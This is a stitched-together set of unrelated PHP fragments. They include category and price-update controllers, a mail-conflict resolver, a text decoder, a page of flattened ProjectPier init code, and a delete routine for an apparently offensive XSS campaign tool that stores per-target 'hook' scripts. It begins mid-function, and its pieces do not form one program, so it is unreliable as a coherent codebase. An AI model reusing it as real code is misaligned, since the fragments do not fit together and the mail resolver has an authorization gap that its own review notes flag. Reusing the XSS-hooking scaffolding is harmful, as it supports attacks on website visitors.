            $delete_categories = array_diff($current_categories, $this->_data['ContactCategories']['category_id']);
            $insert_categories = array_diff($this->_data['ContactCategories']['category_id'], $current_categories);
            $new_categories = array_diff($current_categories, $delete_categories);
            $new_categories += $insert_categories;
        } else {
            // Nothing submitted: every current category is to be removed.
            $delete_categories = $current_categories;
        }
        // A category may not be removed while a ledger entry of that type still needs one.
        $ledger_category = DataObjectFactory::Factory('LedgerCategory');
        $ledger_types = $ledger_category->checkPersonUsage($person_id);
        foreach ($ledger_types as $ledger_type => $categories) {
            if ($categories['exists'] && !array_intersect($categories['categories'], $new_categories)) {
                foreach (array_intersect($categories['categories'], $delete_categories) as $category_id) {
                    $category = DataObjectFactory::Factory('ContactCategory');
                    $category->load($category_id);
                    $errors[$category->name] = 'Cannot remove category ' . $category->name . ' - ' . $ledger_type . ' entry exists';
                }
            }
        }
        $result = count($errors) == 0;
        if (!empty($delete_categories) && $result) {
            // All OK, so delete the associations
            $result = $people_category->delete(array_keys($delete_categories), $errors);
        }
        if (!empty($insert_categories) && $result) {
            // No errors and some new categories to assign to the person
            $result = $people_category->insert($insert_categories, $person_id);
        }
        if ($result) {
            // All OK
            $db->CompleteTrans();
            sendTo($this->name, 'view', $this->_modules, array($personidfield => $person_id));
        }
    }
    // Error path: report, roll back and redisplay the form.
    $flash = Flash::Instance();
    $flash->addErrors($errors);
    $db->FailTrans();
    $db->CompleteTrans();
    $this->refresh();
}
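/**
 * Delete the record identified by $params['id'] through the parent controller, then reroute.
 *
 * The record is loaded before delegating to parent::delete(); the request always ends with a
 * reroute to SESSION.LastPageURL. The Flash instance previously fetched here was never used
 * and has been dropped.
 *
 * @param \Base $f3
 * @param array $params
 */
public function delete(\Base $f3, $params)
{
    $this->resource->reset();
    if (isset($params['id'])) {
        $this->resource->load(array('_id = ?', $params['id']));
        parent::delete($f3, $params);
    }
    $f3->reroute($f3->get('SESSION.LastPageURL'));
}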
* resources etc * * @version 1.0 * @http://www.projectpier.org/ */ trace(__FILE__, 'begin'); define('FILE_STORAGE_FILE_SYSTEM', 'fs'); define('FILE_STORAGE_MYSQL', 'mysql'); define('TOKEN_COOKIE_NAME', 'pp088' . TABLE_PREFIX); //$installation_root = config_option('installation_root', dirname($_SERVER['PHP_SELF']) ); $path = $_SERVER['PHP_SELF']; $path = substr($path, 0, strpos($path, 'index.php')); $installation_root = $path; define('ROOT_URL', $installation_root); // Init flash! Flash::instance(); $language = config_option('installation_base_language', 'en_us'); if (isset($_GET['language'])) { $_SESSION['language'] = $_GET['language']; $_GET['language'] = ''; } if (isset($_SESSION['language'])) { $language = $_SESSION['language']; } if (!plugin_active('i18n')) { Localization::instance()->loadSettings($language, ROOT . '/language'); } try { trace(__FILE__, 'CompanyWebsite::init()'); CompanyWebsite::init(); if (config_option('upgrade_check_enabled', false)) {
} if (!is_writable('framework/data/')) { $writeableErr[] = sprintf('please make sure that the \'%s\' directory is writable.', 'framework/data/'); } if (!is_writable('framework/data/site_config.json')) { $writeableErr[] = sprintf('please make sure that the \'%s\' file is writable.', 'framework/data/site_config.json'); } //handles all pagination \Template::instance()->extend('pagebrowser', '\\Pagination::renderTag'); \Template\FooForms::init(); if (isset($writeableErr)) { header('Content-Type: text;'); die(implode("\n", $writeableErr)); } //Initialize some F3 Settings $f3->set('FLASH', Flash::instance()); $web = Web::instance(); //Database Setup From our Config Class Instance $cfg = Config::instance(); $f3->set('CONFIG', $cfg); if ($cfg->ACTIVE_DB) { $f3->set('DB', DBHandler::instance()->get($cfg->ACTIVE_DB)); } else { $f3->error(500, 'Sorry, but there is no active DB setup.'); } /////////////// // frontend // /////////////// $f3->route(array('GET /', 'GET /@page', 'GET /payloads', 'GET /page/@page'), 'Controller\\Payload->getList'); // view single $f3->route(array('GET /payload/@id'), 'Controller\\Payload->viewSingle');
/**
 * Returns and removes variable from flash.
 *
 * Reads $name from the Flash singleton, deletes it there, and hands the read value back.
 *
 * @param string $name
 * @return mixed whatever getVariable() returned for $name before removal
 */
function flash_pop($name)
{
    $flash = Flash::instance();
    $value = $flash->getVariable($name);
    $flash->removeVariable($name);
    return $value;
}
/**
 * Conflict incoming mail
 *
 * Shows (and on submit, resolves) the form for an incoming mail whose automatic import did
 * not complete. On submit the subject, body, author, object type and — for comments — the
 * parent id are taken from the posted 'mail' block, the mail is re-imported through
 * IncomingMailImporter::importPendingEmail(), and on success the pending mail is deleted and
 * the created object linked (inline text for async calls, flash + redirect otherwise).
 * A failed import answers HTTP_ERR_INVALID_PROPERTIES (async) or a flash error.
 * Without a posted block the form is pre-filled from the stored mail and the current status
 * description is flashed as an error.
 *
 * NOTE(review): object_type, parent_id and created_by_id come straight from the request; no
 * check is visible here that the parent object belongs to the mail's project or that the
 * submitter may post as the chosen creator — confirm the importer enforces this.
 *
 * @param void
 * @return void
 */
function conflict()
{
    if ($this->active_mail->isNew()) {
        $this->httpError(HTTP_ERR_NOT_FOUND);
    } // if
    require_once INCOMING_MAIL_MODULE_PATH . '/models/IncomingMailImporter.class.php';
    $mail_data = $this->request->post('mail');
    if (!is_foreachable($mail_data)) {
        // Nothing posted: explain the current state and seed the form from the stored mail.
        flash_error(incoming_mail_module_get_status_description($this->active_mail->getState()));
        $mail_data = array('subject' => $this->active_mail->getSubject(), 'body' => $this->active_mail->getBody(), 'created_by_id' => $this->active_mail->getCreatedById(), 'project_id' => $this->active_mail->getProjectId());
    } // if
    if ($this->request->isSubmitted()) {
        $this->active_mail->setSubject(array_var($mail_data, 'subject'));
        $this->active_mail->setBody(array_var($mail_data, 'body'));
        // 'original_author' keeps the sender; any other value selects an existing User.
        $creator_id = array_var($mail_data, 'created_by_id');
        if ($creator_id && $creator_id != 'original_author') {
            $creator = Users::findById($creator_id);
            if (instance_of($creator, 'User')) {
                $this->active_mail->setCreatedBy($creator);
            } // if
        } // if
        $this->active_mail->setCreatedById(array_var($mail_data, 'created_by_id'));
        $this->active_mail->setObjectType(array_var($mail_data, 'object_type'));
        if (array_var($mail_data, 'object_type') == 'comment') {
            $this->active_mail->setParentId(array_var($mail_data, 'parent_id'));
        } // if
        // import email (second argument: keep the original author as creator)
        if (instance_of($importing_result = IncomingMailImporter::importPendingEmail($this->active_mail, $creator_id == 'original_author'), 'ProjectObject')) {
            // we have successfully imported email
            $this->active_mail->delete();
            if ($this->request->isAsyncCall()) {
                $this->renderText(lang('<p>Conflict Solved Successfully!</p><p>View created <a href=":url">:object</a>.</p>', array('object' => $this->active_mail->getObjectType(), 'url' => $importing_result->getViewUrl())));
            } else {
                flash_success('Conflict Solved Successfully!');
                $this->redirectTo('incoming_mail');
            } // if
        } else {
            if ($this->request->isAsyncCall()) {
                $this->httpError(HTTP_ERR_INVALID_PROPERTIES, null, false, 2);
            } else {
                // Assumes a failed import yields an object with getMessage() — TODO confirm.
                flash_error($importing_result->getMessage());
            } // if
        } // if
    } // if
    // Render the conflict form.
    $user = $this->active_mail->getCreatedBy();
    if (instance_of($user, 'User')) {
        $this->smarty->assign('object_user', $user);
    } else {
        $this->smarty->assign('object_user', $this->logged_user);
    } // if
    $this->smarty->assign(array('async' => $this->request->isAsyncCall(), 'form_url' => $this->active_mail->getImportUrl() . ($this->request->isAsyncCall() ? '?skip_layout=1&async=1' : ''), 'status_message' => incoming_mail_module_get_status_description($this->active_mail->getState()), 'mail_data' => $mail_data, 'project' => $this->active_mail->getProject()));
    $flash =& Flash::instance();
    $flash->init();
    js_assign('additional_fields_url', assemble_url('incoming_mail_additional_form_fields'));
}
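/**
 * Handles Decoding Functions
 *
 * Decodes POST.encoded according to POST.encodedFormat — 'base64', 'hex', 'hex_0x'
 * (0x-prefixed bytes), 'hex_slash_x' (\x-prefixed bytes) or 'rot13' — and stores the result
 * under response data 'content'. Invalid input, an unknown format or a PHP build without
 * hex2bin() is reported through Flash warnings. Only acts on POST; the form is SUBPART
 * dencoder_decoder_multi.html.
 *
 * Fix: hex input was checked with is_numeric('0x' . $hex), which PHP 7 rejects for every hex
 * string (hexadecimal numeric strings were dropped in 7.0), so hex decoding never worked
 * there; the check is now ctype_xdigit() plus an even length (hex2bin() needs whole bytes,
 * and warns on odd input). The three identical hex branches share one helper.
 *
 * @param \Base $f3
 */
public function decoder_multi(\Base $f3)
{
    $this->response->data['SUBPART'] = 'dencoder_decoder_multi.html';
    if ($f3->get('VERB') != 'POST') {
        return;
    }
    if ($f3->devoid('POST.encoded')) {
        \Flash::instance()->addMessage('Please enter Some text to decode e.g. 0xaaaa ', 'warning');
        return;
    }
    $encoded_text_string = $f3->get('POST.encoded');
    $encodedFormat = $f3->get('POST.encodedFormat');
    switch ($encodedFormat) {
        case "base64":
            $decoded = trim($encoded_text_string);
            // Round-trip check: only canonical base64 (correct alphabet and padding) passes.
            if (base64_encode(base64_decode($decoded)) === $decoded) {
                $this->response->data['content'] = base64_decode($decoded, true);
            } else {
                \Flash::instance()->addMessage('Please enter a valid base 64 string e.g. dGVzdG1l ', 'warning');
            }
            break;
        case "hex":
            $this->decodeHexDigits(trim($encoded_text_string));
            break;
        case "hex_0x":
            $this->decodeHexDigits(trim(str_replace("0x", "", $encoded_text_string)));
            break;
        case "hex_slash_x":
            $this->decodeHexDigits(trim(str_replace("\\x", "", $encoded_text_string)));
            break;
        case "rot13":
            $this->response->data['content'] = str_rot13(trim($encoded_text_string));
            break;
        default:
            \Flash::instance()->addMessage('Seems You have Broken something or text is invalid \\n I can\'t process', 'warning');
    }
}

/**
 * Decode a bare string of hex digits into bytes and publish it as response content.
 *
 * Flashes a warning when the string is empty, contains non-hex characters or has an odd
 * length, and a different warning when this PHP build lacks hex2bin() (PHP < 5.4).
 *
 * @param string $hexDigits hex digits with any 0x / \x prefixes already stripped
 */
private function decodeHexDigits($hexDigits)
{
    if ($hexDigits === '' || !ctype_xdigit($hexDigits) || strlen($hexDigits) % 2 !== 0) {
        \Flash::instance()->addMessage('Invalid Hexadecimal String detected, check for trailing spaces or invalid characters then try again.', 'warning');
        return;
    }
    if (!function_exists('hex2bin')) {
        \Flash::instance()->addMessage('Seems you are missing the hex2bin function , this is common with PHP 5.3 and below \\n Sorry I can\'t work this . ', 'warning');
        return;
    }
    $this->response->data['content'] = hex2bin($hexDigits);
}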
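/**
 * Delete Cookies & Files with content from hooking page
 *
 * Removes the three files generated for an XSS campaign — the captured vulnerable page
 * (ROOT + path of vulnerablePageContent), the indirect target page (ROOT + path of
 * indirect_target_page) and the hook script (ROOT.BASE/scripts/<host of vulnerableUrl>.js) —
 * then deletes the record via the parent and reroutes to SESSION.LastPageURL.
 *
 * The stored URLs originate from campaign input, so each path is resolved with realpath()
 * and only unlinked when it is a regular file inside its expected directory (ROOT for the
 * pages, the scripts/ directory for the hook). Previously a "../" segment in a stored path
 * could delete files outside ROOT, and all three unlink() calls ran even when only one of
 * the files existed.
 *
 * @param \Base $f3
 * @param array $params route params: 'id'
 */
public function delete(\Base $f3, $params)
{
    $this->resource->reset();
    if (isset($params['id'])) {
        $this->resource->load(array('_id = ?', $params['id']));
        $url1 = $this->resource->vulnerablePageContent;
        $url2 = $this->resource->indirect_target_page;
        $url3 = $this->resource->vulnerableUrl;
        $root = $f3->ROOT;
        $scripts_dir = $f3->ROOT . $f3->BASE . '/scripts/';
        $vulnPage = $root . parse_url($url1, PHP_URL_PATH);
        $targetPage = $root . parse_url($url2, PHP_URL_PATH);
        $attack_script = $scripts_dir . parse_url($url3, PHP_URL_HOST) . '.js';
        $this->unlinkInside($root, $vulnPage);
        $this->unlinkInside($root, $targetPage);
        $this->unlinkInside($scripts_dir, $attack_script);
        parent::delete($f3, $params);
    }
    $f3->reroute($f3->get('SESSION.LastPageURL'));
}

/**
 * unlink() $path only if it resolves to an existing regular file under $baseDir.
 *
 * Both paths are canonicalised with realpath(), which resolves "." / ".." segments and
 * symlinks, so a stored URL cannot steer the delete outside the campaign directories.
 *
 * @param string $baseDir directory the file must live in
 * @param string $path    candidate file path
 * @return bool true when a file was removed
 */
private function unlinkInside($baseDir, $path)
{
    $base = realpath($baseDir);
    $real = realpath($path);
    if ($base === false || $real === false || !is_file($real)) {
        return false;
    }
    $base = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($real, $base, strlen($base)) !== 0) {
        return false;
    }
    return unlink($real);
}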
/**
 * Unpublish the post identified by $params['id'] and return to the post list.
 *
 * updateProperty() sets 'published' to false on the matching record; its result decides
 * whether the success or the 'not found' message is flashed. Always reroutes to /admin/post.
 *
 * @param \Base $f3
 * @param array $params
 */
public function hide($f3, $params)
{
    $updated = $this->resource->updateProperty(array('_id = ?', $params['id']), 'published', false);
    $message = $updated ? 'Your post is now hidden.' : 'This Post ID was not found';
    $level = $updated ? 'success' : 'danger';
    \Flash::instance()->addMessage($message, $level);
    $f3->reroute('/admin/post');
}
/**
 * Apply the queued price uplift for one page of selected product lines (AJAX step).
 *
 * Reads the uplift window (price_uplift_start_date / _end_date) and the selections for the
 * requested page from $_SESSION['price_uplift'], and for every line marked select == 'true':
 * closes the current SOProductLine by setting its end_date, then saves a copy (new id via
 * autoHandle) carrying new_price, start_date and the current user as creator. Unchanged
 * prices are reported as warnings, failures as errors. Progress/updated counters in the
 * session are advanced, messages are stored in Flash, and a JSON summary
 * {updated_count, warnings, errors} is echoed before exit.
 *
 * NOTE(review): each line gets its own StartTrans()/CompleteTrans() pair; on an error the
 * transaction is completed rather than explicitly failed, so whether the "close old price"
 * write is rolled back depends on the DB layer's transaction handling — confirm.
 */
public function update_prices()
{
    $flash = Flash::instance();
    $errors = array();
    $warnings = array();
    $db = DB::Instance();
    $start_date = $_SESSION['price_uplift_params']['price_uplift_start_date'];
    $end_date = $_SESSION['price_uplift_params']['price_uplift_end_date'];
    // Selections were stored per page by an earlier step; nothing selected -> nothing to do.
    $selected = empty($_SESSION['price_uplift'][$this->_data['page']]) ? array() : $_SESSION['price_uplift'][$this->_data['page']];
    $count = 0;
    foreach ($selected as $id => $detail) {
        $db->StartTrans();
        if ($detail['select'] == 'true') {
            $productline = DataObjectFactory::Factory('SOProductLine');
            $productline->load($id);
            if (!$productline->isLoaded()) {
                $errors[$id] = 'Failed to find product details ' . $id;
            } elseif ($productline->price == $detail['new_price']) {
                $warnings[$id] = 'Entry not updated because price has not changed ref:' . $id;
            } else {
                // Close off the existing price at the uplift end date ...
                $productline->end_date = $end_date;
                if (!$productline->save()) {
                    $errors[$id] = 'Failed to close off old price ref:' . $id . ' - ' . $db->ErrorMsg();
                } else {
                    // ... then insert the new price as a fresh row under a new identifier.
                    $test = $productline->autoHandle($productline->idField);
                    if ($test !== false) {
                        $productline->id = $test;
                        $productline->price = $detail['new_price'];
                        $productline->start_date = $start_date;
                        $productline->end_date = null;
                        $productline->created = fix_date(date(DATE_FORMAT));
                        $productline->createdby = EGS_USERNAME;
                        if (!$productline->save()) {
                            $errors[$id] = 'Failed to save new price ref:' . $id . ' - ' . $db->ErrorMsg();
                        } else {
                            $count++;
                        }
                    } else {
                        $errors[] = 'Error getting identifier for new price';
                    }
                }
            }
            unset($productline);
        }
        $db->CompleteTrans();
        $_SESSION['price_uplift_params']['price_uplift_progress_count']++;
    }
    if (count($errors) > 0) {
        $flash->addErrors($errors);
    }
    if (count($warnings) > 0) {
        $flash->addWarnings($warnings);
    }
    // Flash is saved explicitly, presumably because the request ends with exit, not a redirect.
    $flash->save();
    $_SESSION['price_uplift_params']['price_uplift_updated_count'] += $count;
    echo json_encode(array('updated_count' => $count, 'warnings' => $warnings, 'errors' => $errors));
    exit;
}